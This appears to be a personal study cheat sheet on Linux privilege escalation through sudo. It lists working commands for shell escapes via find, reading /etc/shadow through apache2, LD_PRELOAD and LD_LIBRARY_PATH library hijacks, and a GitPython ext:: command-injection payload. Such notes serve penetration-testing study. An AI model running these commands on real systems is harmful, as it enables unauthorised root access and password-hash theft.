Run a program as a specific user
sudo -u username programList programs a user is allowed to run
sudo -lShell escape sequences
Even if we are restricted to running certain programs via sudo, it is sometimes possible to “escape” the program and spawn the shell.
LSE
./lse.sh -i | moreGo to gtfbins.io
example with find
sudo find . -exec /bin/sh \; -quit
Abusing Intended Functionality
Example with apache2
Apache doesn’t have any escape sequences but while parsing a configuration file it will give us error thus we will be able to read the file.
sudo apache2 -f /etc/shadowEnvironment variables
Programs run through sudo can inherit the environment variables from the user’s environment.
In the /etc/sudoers/ config file, if the env_reset option is set, sudo will run programs in a new, minimal environment.
The env_keep option can be used to keep certain environment variables from the user’s enviroments. The configured options are displayed when running sudo -l
LD_PRELOAD
It is an environment variable which can be set to the path of a shared object (.so) file.
When set, the shared object will be loaded before any others.
By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded.
Exploit
- Check with sudo -l if env_keep+= LD_PrEload
- vim preload.c
- /home/jay/Documents/tool_for_oscp/Linux-PrivEsc-Tools/tools/sudo/preload.c
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
sudo LD_PRELOAD=/tmp/preload.so findLD_LIBRARY_PATH
The LD_LIBRARY_PATH environment variable contains a set of directories where shared libraries are searched for first.
the ldd command can be used to print the shared libraries used by a program:
ldd /usr/sbin/apache2By creating a shared library with the same name as one used by a program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead.
Exploit
- Check with sudo -l if env_keep+=LD_LIBRARY_PATH is set
- ldd command against the program in the list
- /home/jay/Documents/tool_for_oscp/Linux-PrivEsc-Tools/tools/sudo/library_path.c
sed -i 's/\xC2\xA0/ /g' library_path.c
gcc -o libcrypt.so.1 (choose form the output of ldd command) -shared -fPIC library_path.c
sudo LD_LIBRARY_PATH=. apache2Gitpython
pip show gitpython
Name: GitPython Version: 3.1.29 Summary: GitPython is a python library used to interact with Git repositories
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
Found using gitpython vulnerbiltiy and chatgpt
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c /tmp/bad"